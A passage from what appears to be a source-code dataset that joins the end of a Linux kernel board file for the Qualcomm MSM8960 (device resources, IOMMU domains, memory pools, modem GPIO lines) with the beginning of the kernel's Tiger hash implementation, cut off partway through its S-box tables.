.flags = IORESOURCE_IRQ,
},
{
.start = 0x00A40000,
.end = 0x00A40000 + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
};
struct platform_device msm8960_device_ebi1_ch0_erp = {
.name = "msm_ebi_erp",
.id = 0,
.num_resources = ARRAY_SIZE(msm_ebi1_ch0_erp_resources),
.resource = msm_ebi1_ch0_erp_resources,
};
static struct resource msm_ebi1_ch1_erp_resources[] = {
{
.start = HSDDRX_EBI1CH1_IRQ,
.flags = IORESOURCE_IRQ,
},
{
.start = 0x00D40000,
.end = 0x00D40000 + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
};
struct platform_device msm8960_device_ebi1_ch1_erp = {
.name = "msm_ebi_erp",
.id = 1,
.num_resources = ARRAY_SIZE(msm_ebi1_ch1_erp_resources),
.resource = msm_ebi1_ch1_erp_resources,
};
static struct resource msm_cache_erp_resources[] = {
{
.name = "l1_irq",
.start = SC_SICCPUXEXTFAULTIRPTREQ,
.flags = IORESOURCE_IRQ,
},
{
.name = "l2_irq",
.start = APCC_QGICL2IRPTREQ,
.flags = IORESOURCE_IRQ,
}
};
struct platform_device msm8960_device_cache_erp = {
.name = "msm_cache_erp",
.id = -1,
.num_resources = ARRAY_SIZE(msm_cache_erp_resources),
.resource = msm_cache_erp_resources,
};
struct msm_iommu_domain_name msm8960_iommu_ctx_names[] = {
/* Camera */
{
.name = "ijpeg_src",
.domain = CAMERA_DOMAIN,
},
/* Camera */
{
.name = "ijpeg_dst",
.domain = CAMERA_DOMAIN,
},
/* Camera */
{
.name = "jpegd_src",
.domain = CAMERA_DOMAIN,
},
/* Camera */
{
.name = "jpegd_dst",
.domain = CAMERA_DOMAIN,
},
/* Rotator */
{
.name = "rot_src",
.domain = ROTATOR_SRC_DOMAIN,
},
/* Rotator */
{
.name = "rot_dst",
.domain = ROTATOR_SRC_DOMAIN,
},
/* Video */
{
.name = "vcodec_a_mm1",
.domain = VIDEO_DOMAIN,
},
/* Video */
{
.name = "vcodec_b_mm2",
.domain = VIDEO_DOMAIN,
},
/* Video */
{
.name = "vcodec_a_stream",
.domain = VIDEO_DOMAIN,
},
};
static struct mem_pool msm8960_video_pools[] = {
/*
* Video hardware has the following requirements:
* 1. All video addresses used by the video hardware must be at a higher
* address than video firmware address.
* 2. Video hardware can only access a range of 256MB from the base of
* the video firmware.
*/
[VIDEO_FIRMWARE_POOL] =
/* Low addresses, intended for video firmware */
{
.paddr = SZ_128K,
.size = SZ_16M - SZ_128K,
},
[VIDEO_MAIN_POOL] =
/* Main video pool */
{
.paddr = SZ_16M,
.size = SZ_256M - SZ_16M,
},
[GEN_POOL] =
/* Remaining address space up to 2G */
{
.paddr = SZ_256M,
.size = SZ_2G - SZ_256M,
},
};
static struct mem_pool msm8960_camera_pools[] = {
[GEN_POOL] =
/* One address space for camera */
{
.paddr = SZ_128K,
.size = SZ_2G - SZ_128K,
},
};
static struct mem_pool msm8960_display_read_pools[] = {
[GEN_POOL] =
/* One address space for display reads */
{
.paddr = SZ_128K,
.size = SZ_2G - SZ_128K,
},
};
static struct mem_pool msm8960_rotator_src_pools[] = {
[GEN_POOL] =
/* One address space for rotator src */
{
.paddr = SZ_128K,
.size = SZ_2G - SZ_128K,
},
};
static struct msm_iommu_domain msm8960_iommu_domains[] = {
[VIDEO_DOMAIN] = {
.iova_pools = msm8960_video_pools,
.npools = ARRAY_SIZE(msm8960_video_pools),
},
[CAMERA_DOMAIN] = {
.iova_pools = msm8960_camera_pools,
.npools = ARRAY_SIZE(msm8960_camera_pools),
},
[DISPLAY_READ_DOMAIN] = {
.iova_pools = msm8960_display_read_pools,
.npools = ARRAY_SIZE(msm8960_display_read_pools),
},
[ROTATOR_SRC_DOMAIN] = {
.iova_pools = msm8960_rotator_src_pools,
.npools = ARRAY_SIZE(msm8960_rotator_src_pools),
},
};
struct iommu_domains_pdata msm8960_iommu_domain_pdata = {
.domains = msm8960_iommu_domains,
.ndomains = ARRAY_SIZE(msm8960_iommu_domains),
.domain_names = msm8960_iommu_ctx_names,
.nnames = ARRAY_SIZE(msm8960_iommu_ctx_names),
.domain_alloc_flags = 0,
};
struct platform_device msm8960_iommu_domain_device = {
.name = "iommu_domains",
.id = -1,
.dev = {
.platform_data = &msm8960_iommu_domain_pdata,
}
};
struct msm_rtb_platform_data msm8960_rtb_pdata = {
.size = SZ_1M,
};
static int __init msm_rtb_set_buffer_size(char *p)
{
int s;
s = memparse(p, NULL);
msm8960_rtb_pdata.size = ALIGN(s, SZ_4K);
return 0;
}
early_param("msm_rtb_size", msm_rtb_set_buffer_size);
struct platform_device msm8960_rtb_device = {
.name = "msm_rtb",
.id = -1,
.dev = {
.platform_data = &msm8960_rtb_pdata,
},
};
#define MSM_8960_L1_SIZE SZ_1M
/*
* The actual L2 size is smaller but we need a larger buffer
* size to store other dump information
*/
#define MSM_8960_L2_SIZE SZ_4M
struct msm_cache_dump_platform_data msm8960_cache_dump_pdata = {
.l2_size = MSM_8960_L2_SIZE,
.l1_size = MSM_8960_L1_SIZE,
};
struct platform_device msm8960_cache_dump_device = {
.name = "msm_cache_dump",
.id = -1,
.dev = {
.platform_data = &msm8960_cache_dump_pdata,
},
};
#define MDM2AP_ERRFATAL 40
#define AP2MDM_ERRFATAL 80
#define MDM2AP_STATUS 24
#define AP2MDM_STATUS 77
#define AP2MDM_PMIC_PWR_EN 22
#define AP2MDM_KPDPWR_N 79
#define AP2MDM_SOFT_RESET 78
#define USB_SW 25
static struct resource sglte_resources[] = {
{
.start = MDM2AP_ERRFATAL,
.end = MDM2AP_ERRFATAL,
.name = "MDM2AP_ERRFATAL",
.flags = IORESOURCE_IO,
},
{
.start = AP2MDM_ERRFATAL,
.end = AP2MDM_ERRFATAL,
.name = "AP2MDM_ERRFATAL",
.flags = IORESOURCE_IO,
},
{
.start = MDM2AP_STATUS,
.end = MDM2AP_STATUS,
.name = "MDM2AP_STATUS",
.flags = IORESOURCE_IO,
},
{
.start = AP2MDM_STATUS,
.end = AP2MDM_STATUS,
.name = "AP2MDM_STATUS",
.flags = IORESOURCE_IO,
},
{
.start = AP2MDM_PMIC_PWR_EN,
.end = AP2MDM_PMIC_PWR_EN,
.name = "AP2MDM_PMIC_PWR_EN",
.flags = IORESOURCE_IO,
},
{
.start = AP2MDM_KPDPWR_N,
.end = AP2MDM_KPDPWR_N,
.name = "AP2MDM_KPDPWR_N",
.flags = IORESOURCE_IO,
},
{
.start = AP2MDM_SOFT_RESET,
.end = AP2MDM_SOFT_RESET,
.name = "AP2MDM_SOFT_RESET",
.flags = IORESOURCE_IO,
},
{
.start = USB_SW,
.end = USB_SW,
.name = "USB_SW",
.flags = IORESOURCE_IO,
},
};
struct platform_device msm_gpio_device = {
.name = "msmgpio",
.id = -1,
};
struct platform_device mdm_sglte_device = {
.name = "mdm2_modem",
.id = -1,
.num_resources = ARRAY_SIZE(sglte_resources),
.resource = sglte_resources,
};
struct platform_device *msm8960_vidc_device[] __initdata = {
&msm_device_vidc
};
void __init msm8960_add_vidc_device(void)
{
if (cpu_is_msm8960ab()) {
struct msm_vidc_platform_data *pdata;
pdata = (struct msm_vidc_platform_data *)
msm_device_vidc.dev.platform_data;
pdata->vidc_bus_client_pdata = &vidc_pro_bus_client_data;
}
platform_add_devices(msm8960_vidc_device,
ARRAY_SIZE(msm8960_vidc_device));
}
| gpl-2.0 |
JustAkan/jolla-kernel_GK-GPRO_Gen3 | crypto/tgr192.c | 4 | 31600 | /*
* Cryptographic API.
*
* Tiger hashing Algorithm
*
* Copyright (C) 1998 Free Software Foundation, Inc.
*
* The Tiger algorithm was developed by Ross Anderson and Eli Biham.
* It was optimized for 64-bit processors while still delievering
* decent performance on 32 and 16-bit processors.
*
* This version is derived from the GnuPG implementation and the
* Tiger-Perl interface written by Rafael Sevilla
*
* Adapted for Linux Kernel Crypto by Aaron Grothe
* ajgrothe@yahoo.com, February 22, 2005
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
*/
#include <crypto/internal/hash.h>
#include <linux/init.h>
#include <linux/module.h>
#include <linux/mm.h>
#include <asm/byteorder.h>
#include <linux/types.h>
#define TGR192_DIGEST_SIZE 24
#define TGR160_DIGEST_SIZE 20
#define TGR128_DIGEST_SIZE 16
#define TGR192_BLOCK_SIZE 64
struct tgr192_ctx {
u64 a, b, c;
u8 hash[64];
int count;
u32 nblocks;
};
static const u64 sbox1[256] = {
0x02aab17cf7e90c5eULL, 0xac424b03e243a8ecULL, 0x72cd5be30dd5fcd3ULL,
0x6d019b93f6f97f3aULL, 0xcd9978ffd21f9193ULL, 0x7573a1c9708029e2ULL,
0xb164326b922a83c3ULL, 0x46883eee04915870ULL, 0xeaace3057103ece6ULL,
0xc54169b808a3535cULL, 0x4ce754918ddec47cULL, 0x0aa2f4dfdc0df40cULL,
0x10b76f18a74dbefaULL, 0xc6ccb6235ad1ab6aULL, 0x13726121572fe2ffULL,
0x1a488c6f199d921eULL, 0x4bc9f9f4da0007caULL, 0x26f5e6f6e85241c7ULL,
0x859079dbea5947b6ULL, 0x4f1885c5c99e8c92ULL, 0xd78e761ea96f864bULL,
0x8e36428c52b5c17dULL, 0x69cf6827373063c1ULL, 0xb607c93d9bb4c56eULL,
0x7d820e760e76b5eaULL, 0x645c9cc6f07fdc42ULL, 0xbf38a078243342e0ULL,
0x5f6b343c9d2e7d04ULL, 0xf2c28aeb600b0ec6ULL, 0x6c0ed85f7254bcacULL,
0x71592281a4db4fe5ULL, 0x1967fa69ce0fed9fULL, 0xfd5293f8b96545dbULL,
0xc879e9d7f2a7600bULL, 0x860248920193194eULL, 0xa4f9533b2d9cc0b3ULL,
0x9053836c15957613ULL, 0xdb6dcf8afc357bf1ULL, 0x18beea7a7a370f57ULL,
0x037117ca50b99066ULL, 0x6ab30a9774424a35ULL, 0xf4e92f02e325249bULL,
0x7739db07061ccae1ULL, 0xd8f3b49ceca42a05ULL, 0xbd56be3f51382f73ULL,
0x45faed5843b0bb28ULL, 0x1c813d5c11bf1f83ULL, 0x8af0e4b6d75fa169ULL,
0x33ee18a487ad9999ULL, 0x3c26e8eab1c94410ULL, 0xb510102bc0a822f9ULL,
0x141eef310ce6123bULL, 0xfc65b90059ddb154ULL, 0xe0158640c5e0e607ULL,
0x884e079826c3a3cfULL, 0x930d0d9523c535fdULL, 0x35638d754e9a2b00ULL,
0x4085fccf40469dd5ULL, 0xc4b17ad28be23a4cULL, 0xcab2f0fc6a3e6a2eULL,
0x2860971a6b943fcdULL, 0x3dde6ee212e30446ULL, 0x6222f32ae01765aeULL,
0x5d550bb5478308feULL, 0xa9efa98da0eda22aULL, 0xc351a71686c40da7ULL,
0x1105586d9c867c84ULL, 0xdcffee85fda22853ULL, 0xccfbd0262c5eef76ULL,
0xbaf294cb8990d201ULL, 0xe69464f52afad975ULL, 0x94b013afdf133e14ULL,
0x06a7d1a32823c958ULL, 0x6f95fe5130f61119ULL, 0xd92ab34e462c06c0ULL,
0xed7bde33887c71d2ULL, 0x79746d6e6518393eULL, 0x5ba419385d713329ULL,
0x7c1ba6b948a97564ULL, 0x31987c197bfdac67ULL, 0xde6c23c44b053d02ULL,
0x581c49fed002d64dULL, 0xdd474d6338261571ULL, 0xaa4546c3e473d062ULL,
0x928fce349455f860ULL, 0x48161bbacaab94d9ULL, 0x63912430770e6f68ULL,
0x6ec8a5e602c6641cULL, 0x87282515337ddd2bULL, 0x2cda6b42034b701bULL,
0xb03d37c181cb096dULL, 0xe108438266c71c6fULL, 0x2b3180c7eb51b255ULL,
0xdf92b82f96c08bbcULL, 0x5c68c8c0a632f3baULL, 0x5504cc861c3d0556ULL,
0xabbfa4e55fb26b8fULL, 0x41848b0ab3baceb4ULL, 0xb334a273aa445d32ULL,
0xbca696f0a85ad881ULL, 0x24f6ec65b528d56cULL, 0x0ce1512e90f4524aULL,
0x4e9dd79d5506d35aULL, 0x258905fac6ce9779ULL, 0x2019295b3e109b33ULL,
0xf8a9478b73a054ccULL, 0x2924f2f934417eb0ULL, 0x3993357d536d1bc4ULL,
0x38a81ac21db6ff8bULL, 0x47c4fbf17d6016bfULL, 0x1e0faadd7667e3f5ULL,
0x7abcff62938beb96ULL, 0xa78dad948fc179c9ULL, 0x8f1f98b72911e50dULL,
0x61e48eae27121a91ULL, 0x4d62f7ad31859808ULL, 0xeceba345ef5ceaebULL,
0xf5ceb25ebc9684ceULL, 0xf633e20cb7f76221ULL, 0xa32cdf06ab8293e4ULL,
0x985a202ca5ee2ca4ULL, 0xcf0b8447cc8a8fb1ULL, 0x9f765244979859a3ULL,
0xa8d516b1a1240017ULL, 0x0bd7ba3ebb5dc726ULL, 0xe54bca55b86adb39ULL,
0x1d7a3afd6c478063ULL, 0x519ec608e7669eddULL, 0x0e5715a2d149aa23ULL,
0x177d4571848ff194ULL, 0xeeb55f3241014c22ULL, 0x0f5e5ca13a6e2ec2ULL,
0x8029927b75f5c361ULL, 0xad139fabc3d6e436ULL, 0x0d5df1a94ccf402fULL,
0x3e8bd948bea5dfc8ULL, 0xa5a0d357bd3ff77eULL, 0xa2d12e251f74f645ULL,
0x66fd9e525e81a082ULL, 0x2e0c90ce7f687a49ULL, 0xc2e8bcbeba973bc5ULL,
0x000001bce509745fULL, 0x423777bbe6dab3d6ULL, 0xd1661c7eaef06eb5ULL,
0xa1781f354daacfd8ULL, 0x2d11284a2b16affcULL, 0xf1fc4f67fa891d1fULL,
0x73ecc25dcb920adaULL, 0xae610c22c2a12651ULL, 0x96e0a810d356b78aULL,
0x5a9a381f2fe7870fULL, 0xd5ad62ede94e5530ULL, 0xd225e5e8368d1427ULL,
0x65977b70c7af4631ULL, 0x99f889b2de39d74fULL, 0x233f30bf54e1d143ULL,
0x9a9675d3d9a63c97ULL, 0x5470554ff334f9a8ULL, 0x166acb744a4f5688ULL,
0x70c74caab2e4aeadULL, 0xf0d091646f294d12ULL, 0x57b82a89684031d1ULL,
0xefd95a5a61be0b6bULL, 0x2fbd12e969f2f29aULL, 0x9bd37013feff9fe8ULL,
0x3f9b0404d6085a06ULL, 0x4940c1f3166cfe15ULL, 0x09542c4dcdf3defbULL,
0xb4c5218385cd5ce3ULL, 0xc935b7dc4462a641ULL, 0x3417f8a68ed3b63fULL,
0xb80959295b215b40ULL, 0xf99cdaef3b8c8572ULL, 0x018c0614f8fcb95dULL,
0x1b14accd1a3acdf3ULL, 0x84d471f200bb732dULL, 0xc1a3110e95e8da16ULL,
0x430a7220bf1a82b8ULL, 0xb77e090d39df210eULL, 0x5ef4bd9f3cd05e9dULL,
0x9d4ff6da7e57a444ULL, 0xda1d60e183d4a5f8ULL, 0xb287c38417998e47ULL,
0xfe3edc121bb31886ULL, 0xc7fe3ccc980ccbefULL, 0xe46fb590189bfd03ULL,
0x3732fd469a4c57dcULL, 0x7ef700a07cf1ad65ULL, 0x59c64468a31d8859ULL,
0x762fb0b4d45b61f6ULL, 0x155baed099047718ULL, 0x68755e4c3d50baa6ULL,
0xe9214e7f22d8b4dfULL, 0x2addbf532eac95f4ULL, 0x32ae3909b4bd0109ULL,
0x834df537b08e3450ULL, 0xfa209da84220728dULL, 0x9e691d9b9efe23f7ULL,
0x0446d288c4ae8d7fULL, 0x7b4cc524e169785bULL, 0x21d87f0135ca1385ULL,
0xcebb400f137b8aa5ULL, 0x272e2b66580796beULL, 0x3612264125c2b0deULL,
0x057702bdad1efbb2ULL, 0xd4babb8eacf84be9ULL, 0x91583139641bc67bULL,
0x8bdc2de08036e024ULL, 0x603c8156f49f68edULL, 0xf7d236f7dbef5111ULL,
0x9727c4598ad21e80ULL, 0xa08a0896670a5fd7ULL, 0xcb4a8f4309eba9cbULL,
0x81af564b0f7036a1ULL, 0xc0b99aa778199abdULL, 0x959f1ec83fc8e952ULL,
0x8c505077794a81b9ULL, 0x3acaaf8f056338f0ULL, 0x07b43f50627a6778ULL,
0x4a44ab49f5eccc77ULL, 0x3bc3d6e4b679ee98ULL, 0x9cc0d4d1cf14108cULL,
0x4406c00b206bc8a0ULL, 0x82a18854c8d72d89ULL, 0x67e366b35c3c432cULL,
0xb923dd61102b37f2ULL, 0x56ab2779d884271dULL, 0xbe83e1b0ff1525afULL,
0xfb7c65d4217e49a9ULL, 0x6bdbe0e76d48e7d4ULL, 0x08df828745d9179eULL,
0x22ea6a9add53bd34ULL, 0xe36e141c5622200aULL, 0x7f805d1b8cb750eeULL,
0xafe5c7a59f58e837ULL, 0xe27f996a4fb1c23cULL, 0xd3867dfb0775f0d0ULL,
0xd0e673de6e88891aULL, 0x123aeb9eafb86c25ULL, 0x30f1d5d5c145b895ULL,
0xbb434a2dee7269e7ULL, 0x78cb67ecf931fa38ULL, 0xf33b0372323bbf9cULL,
0x52d66336fb279c74ULL, 0x505f33ac0afb4eaaULL, 0xe8a5cd99a2cce187ULL,
0x534974801e2d30bbULL, 0x8d2d5711d5876d90ULL, 0x1f1a412891bc038eULL,
0xd6e2e71d82e56648ULL, 0x74036c3a497732b7ULL, 0x89b67ed96361f5abULL,
0xffed95d8f1ea02a2ULL, 0xe72b3bd61464d43dULL, 0xa6300f170bdc4820ULL,
0xebc18760ed78a77aULL
};
static const u64 sbox2[256] = {
0xe6a6be5a05a12138ULL, 0xb5a122a5b4f87c98ULL, 0x563c6089140b6990ULL,
0x4c46cb2e391f5dd5ULL, 0xd932addbc9b79434ULL, 0x08ea70e42015aff5ULL,
0xd765a6673e478cf1ULL, 0xc4fb757eab278d99ULL, 0xdf11c6862d6e0692ULL,
0xddeb84f10d7f3b16ULL, 0x6f2ef604a665ea04ULL, 0x4a8e0f0ff0e0dfb3ULL,
0xa5edeef83dbcba51ULL, 0xfc4f0a2a0ea4371eULL, 0xe83e1da85cb38429ULL,
0xdc8ff882ba1b1ce2ULL, 0xcd45505e8353e80dULL, 0x18d19a00d4db0717ULL,
0x34a0cfeda5f38101ULL, 0x0be77e518887caf2ULL, 0x1e341438b3c45136ULL,
0xe05797f49089ccf9ULL, 0xffd23f9df2591d14ULL, 0x543dda228595c5cdULL,
0x661f81fd99052a33ULL, 0x8736e641db0f7b76ULL, 0x15227725418e5307ULL,
0xe25f7f46162eb2faULL, 0x48a8b2126c13d9feULL, 0xafdc541792e76eeaULL,
0x03d912bfc6d1898fULL, 0x31b1aafa1b83f51bULL, 0xf1ac2796e42ab7d9ULL,
0x40a3a7d7fcd2ebacULL, 0x1056136d0afbbcc5ULL, 0x7889e1dd9a6d0c85ULL,
0xd33525782a7974aaULL, 0xa7e25d09078ac09bULL, 0xbd4138b3eac6edd0ULL,
0x920abfbe71eb9e70ULL, 0xa2a5d0f54fc2625cULL, 0xc054e36b0b1290a3ULL,
0xf6dd59ff62fe932bULL, 0x3537354511a8ac7dULL, 0xca845e9172fadcd4ULL,
0x84f82b60329d20dcULL, 0x79c62ce1cd672f18ULL, 0x8b09a2add124642cULL,
0xd0c1e96a19d9e726ULL, 0x5a786a9b4ba9500cULL, 0x0e020336634c43f3ULL,
0xc17b474aeb66d822ULL, 0x6a731ae3ec9baac2ULL, 0x8226667ae0840258ULL,
0x67d4567691caeca5ULL, 0x1d94155c4875adb5ULL, 0x6d00fd985b813fdfULL,
0x51286efcb774cd06ULL, 0x5e8834471fa744afULL, 0xf72ca0aee761ae2eULL,
0xbe40e4cdaee8e09aULL, 0xe9970bbb5118f665ULL, 0x726e4beb33df1964ULL,
0x703b000729199762ULL, 0x4631d816f5ef30a7ULL, 0xb880b5b51504a6beULL,
0x641793c37ed84b6cULL, 0x7b21ed77f6e97d96ULL, 0x776306312ef96b73ULL,
0xae528948e86ff3f4ULL, 0x53dbd7f286a3f8f8ULL, 0x16cadce74cfc1063ULL,
0x005c19bdfa52c6ddULL, 0x68868f5d64d46ad3ULL, 0x3a9d512ccf1e186aULL,
0x367e62c2385660aeULL, 0xe359e7ea77dcb1d7ULL, 0x526c0773749abe6eULL,
0x735ae5f9d09f734bULL, 0x493fc7cc8a558ba8ULL, 0xb0b9c1533041ab45ULL,
0x321958ba470a59bdULL, 0x852db00b5f46c393ULL, 0x91209b2bd336b0e5ULL,
0x6e604f7d659ef19fULL, 0xb99a8ae2782ccb24ULL, 0xccf52ab6c814c4c7ULL,
0x4727d9afbe11727bULL, 0x7e950d0c0121b34dULL, 0x756f435670ad471fULL,
0xf5add442615a6849ULL, 0x4e87e09980b9957aULL, 0x2acfa1df50aee355ULL,
0xd898263afd2fd556ULL, 0xc8f4924dd80c8fd6ULL, 0xcf99ca3d754a173aULL,
0xfe477bacaf91bf3cULL, 0xed5371f6d690c12dULL, 0x831a5c285e687094ULL,
0xc5d3c90a3708a0a4ULL, 0x0f7f903717d06580ULL, 0x19f9bb13b8fdf27fULL,
0xb1bd6f1b4d502843ULL, 0x1c761ba38fff4012ULL, 0x0d1530c4e2e21f3bULL,
0x8943ce69a7372c8aULL, 0xe5184e11feb5ce66ULL, 0x618bdb80bd736621ULL,
0x7d29bad68b574d0bULL, 0x81bb613e25e6fe5bULL, 0x071c9c10bc07913fULL,
0xc7beeb7909ac2d97ULL, 0xc3e58d353bc5d757ULL, 0xeb017892f38f61e8ULL,
0xd4effb9c9b1cc21aULL, 0x99727d26f494f7abULL, 0xa3e063a2956b3e03ULL,
0x9d4a8b9a4aa09c30ULL, 0x3f6ab7d500090fb4ULL, 0x9cc0f2a057268ac0ULL,
0x3dee9d2dedbf42d1ULL, 0x330f49c87960a972ULL, 0xc6b2720287421b41ULL,
0x0ac59ec07c00369cULL, 0xef4eac49cb353425ULL, 0xf450244eef0129d8ULL,
0x8acc46e5caf4deb6ULL, 0x2ffeab63989263f7ULL, 0x8f7cb9fe5d7a4578ULL,
0x5bd8f7644e634635ULL, 0x427a7315bf2dc900ULL, 0x17d0c4aa2125261cULL,
0x3992486c93518e50ULL, 0xb4cbfee0a2d7d4c3ULL, 0x7c75d6202c5ddd8dULL,
0xdbc295d8e35b6c61ULL, 0x60b369d302032b19ULL, 0xce42685fdce44132ULL,
0x06f3ddb9ddf65610ULL, 0x8ea4d21db5e148f0ULL, 0x20b0fce62fcd496fULL,
0x2c1b912358b0ee31ULL, 0xb28317b818f5a308ULL, 0xa89c1e189ca6d2cfULL,
0x0c6b18576aaadbc8ULL, 0xb65deaa91299fae3ULL, 0xfb2b794b7f1027e7ULL,
0x04e4317f443b5bebULL, 0x4b852d325939d0a6ULL, 0xd5ae6beefb207ffcULL,
0x309682b281c7d374ULL, 0xbae309a194c3b475ULL, 0x8cc3f97b13b49f05ULL,
0x98a9422ff8293967ULL, 0x244b16b01076ff7cULL, 0xf8bf571c663d67eeULL,
0x1f0d6758eee30da1ULL, 0xc9b611d97adeb9b7ULL, 0xb7afd5887b6c57a2ULL,
0x6290ae846b984fe1ULL, 0x94df4cdeacc1a5fdULL, 0x058a5bd1c5483affULL,
0x63166cc142ba3c37ULL, 0x8db8526eb2f76f40ULL, 0xe10880036f0d6d4eULL,
0x9e0523c9971d311dULL, 0x45ec2824cc7cd691ULL, 0x575b8359e62382c9ULL,
0xfa9e400dc4889995ULL, 0xd1823ecb45721568ULL, 0xdafd983b8206082fULL,
0xaa7d29082386a8cbULL, 0x269fcd4403b87588ULL, 0x1b91f5f728bdd1e0ULL,
0xe4669f39040201f6ULL, 0x7a1d7c218cf04adeULL, 0x65623c29d79ce5ceULL,
0x2368449096c00bb1ULL, 0xab9bf1879da503baULL, 0xbc23ecb1a458058eULL,
0x9a58df01bb401eccULL, 0xa070e868a85f143dULL, 0x4ff188307df2239eULL,
0x14d565b41a641183ULL, 0xee13337452701602ULL, 0x950e3dcf3f285e09ULL,
0x59930254b9c80953ULL, 0x3bf299408930da6dULL, 0xa955943f53691387ULL,
0xa15edecaa9cb8784ULL, 0x29142127352be9a0ULL, 0x76f0371fff4e7afbULL,
0x0239f450274f2228ULL, 0xbb073af01d5e868bULL, 0xbfc80571c10e96c1ULL,
0xd267088568222e23ULL, 0x9671a3d48e80b5b0ULL, 0x55b5d38ae193bb81ULL,
0x693ae2d0a18b04b8ULL, 0x5c48b4ecadd5335fULL, 0xfd743b194916a1caULL,
0x2577018134be98c4ULL, 0xe77987e83c54a4adULL, 0x28e11014da33e1b9ULL,
0x270cc59e226aa213ULL, 0x71495f756d1a5f60ULL, 0x9be853fb60afef77ULL,
0xadc786a7f7443dbfULL, 0x0904456173b29a82ULL, 0x58bc7a66c232bd5eULL,
0xf306558c673ac8b2ULL, 0x41f639c6b6c9772aULL, 0x216defe99fda35daULL,
0x11640cc71c7be615ULL, 0x93c43694565c5527ULL, 0xea038e6246777839ULL,
0xf9abf3ce5a3e2469ULL, 0x741e768d0fd312d2ULL, 0x0144b883ced652c6ULL,
0xc20b5a5ba33f8552ULL, 0x1ae69633c3435a9dULL, 0x97a28ca4088cfdecULL,
0x8824a43c1e96f420ULL, 0x37612fa66eeea746ULL, 0x6b4cb165f9cf0e5aULL,
0x43aa1c06a0abfb4aULL, 0x7f4dc26ff162796bULL, 0x6cbacc8e54ed9b0fULL,
0xa6b7ffefd2bb253eULL, 0x2e25bc95b0a29d4fULL, 0x86d6a58bdef1388cULL,
0xded74ac576b6f054ULL, 0x8030bdbc2b45805dULL, 0x3c81af70e94d9289ULL,
0x3eff6dda9e3100dbULL, 0xb38dc39fdfcc8847ULL, 0x123885528d17b87eULL,
0xf2da0ed240b1b642ULL, 0x44cefadcd54bf9a9ULL, 0x1312200e433c7ee6ULL,
0x9ffcc84f3a78c748ULL, 0xf0cd1f72248576bbULL, 0xec6974053638cfe4ULL,
0x2ba7b67c0cec4e4cULL, 0xac2f4df3e5ce32edULL, 0xcb33d14326ea4c11ULL,
0xa4e9044cc77e58bcULL, 0x5f513293d934fcefULL, 0x5dc9645506e55444ULL,
0x50de418f317de40aULL, 0x388cb31a69dde259ULL, 0x2db4a83455820a86ULL,
0x9010a91e84711ae9ULL, 0x4df7f0b7b1498371ULL, 0xd62a2eabc0977179ULL,
0x22fac097aa8d5c0eULL
};
static const u64 sbox3[256] = {
0xf49fcc2ff1daf39bULL, 0x487fd5c66ff29281ULL, 0xe8a30667fcdca83fULL,
0x2c9b4be3d2fcce63ULL, 0xda3ff74b93fbbbc2ULL, 0x2fa165d2fe70ba66ULL,
0xa103e279970e93d4ULL, 0xbecdec77b0e45e71ULL, 0xcfb41e723985e497ULL,
0xb70aaa025ef75017ULL, 0xd42309f03840b8e0ULL, 0x8efc1ad035898579ULL,
0x96c6920be2b2abc5ULL, 0x66af4163375a9172ULL, 0x2174abdcca7127fbULL,
0xb33ccea64a72ff41ULL, 0xf04a4933083066a5ULL, 0x8d970acdd7289af5ULL,
0x8f96e8e031c8c25eULL, 0xf3fec02276875d47ULL, 0xec7bf310056190ddULL,
0xf5adb0aebb0f1491ULL, 0x9b50f8850fd58892ULL, 0x4975488358b74de8ULL,
0xa3354ff691531c61ULL, 0x0702bbe481d2c6eeULL, 0x89fb24057deded98ULL,
0xac3075138596e902ULL, 0x1d2d3580172772edULL, 0xeb738fc28e6bc30dULL,
0x5854ef8f63044326ULL, 0x9e5c52325add3bbeULL, 0x90aa53cf325c4623ULL,
0xc1d24d51349dd067ULL, 0x2051cfeea69ea624ULL, 0x13220f0a862e7e4fULL,
0xce39399404e04864ULL, 0xd9c42ca47086fcb7ULL, 0x685ad2238a03e7ccULL,
0x066484b2ab2ff1dbULL, 0xfe9d5d70efbf79ecULL, 0x5b13b9dd9c481854ULL,
0x15f0d475ed1509adULL, 0x0bebcd060ec79851ULL, 0xd58c6791183ab7f8ULL,
0xd1187c5052f3eee4ULL, 0xc95d1192e54e82ffULL, 0x86eea14cb9ac6ca2ULL,
0x3485beb153677d5dULL, 0xdd191d781f8c492aULL, 0xf60866baa784ebf9ULL,
0x518f643ba2d08c74ULL, 0x8852e956e1087c22ULL, 0xa768cb8dc410ae8dULL,
0x38047726bfec8e1aULL, 0xa67738b4cd3b45aaULL, 0xad16691cec0dde19ULL,
0xc6d4319380462e07ULL, 0xc5a5876d0ba61938ULL, 0x16b9fa1fa58fd840ULL,
0x188ab1173ca74f18ULL, 0xabda2f98c99c021fULL, 0x3e0580ab134ae816ULL,
0x5f3b05b773645abbULL, 0x2501a2be5575f2f6ULL, 0x1b2f74004e7e8ba9ULL,
0x1cd7580371e8d953ULL, 0x7f6ed89562764e30ULL, 0xb15926ff596f003dULL,
0x9f65293da8c5d6b9ULL, 0x6ecef04dd690f84cULL, 0x4782275fff33af88ULL,
0xe41433083f820801ULL, 0xfd0dfe409a1af9b5ULL, 0x4325a3342cdb396bULL,
0x8ae77e62b301b252ULL, 0xc36f9e9f6655615aULL, 0x85455a2d92d32c09ULL,
0xf2c7dea949477485ULL, 0x63cfb4c133a39ebaULL, 0x83b040cc6ebc5462ULL,
0x3b9454c8fdb326b0ULL, 0x56f56a9e87ffd78cULL, 0x2dc2940d99f42bc6ULL,
0x98f7df096b096e2dULL, 0x19a6e01e3ad852bfULL, 0x42a99ccbdbd4b40bULL,
0xa59998af45e9c559ULL, 0x366295e807d93186ULL, 0x6b48181bfaa1f773ULL,
0x1fec57e2157a0a1dULL, 0x4667446af6201ad5ULL, 0xe615ebcacfb0f075ULL,
0xb8f31f4f68290778ULL, 0x22713ed6ce22d11eULL, 0x3057c1a72ec3c93bULL,
0xcb46acc37c3f1f2fULL, 0xdbb893fd02aaf50eULL, 0x331fd92e600b9fcfULL,
0xa498f96148ea3ad6ULL, 0xa8d8426e8b6a83eaULL, 0xa089b274b7735cdcULL,
0x87f6b3731e524a11ULL, 0x118808e5cbc96749ULL, 0x9906e4c7b19bd394ULL,
0xafed7f7e9b24a20cULL, 0x6509eadeeb3644a7ULL, 0x6c1ef1d3e8ef0edeULL,
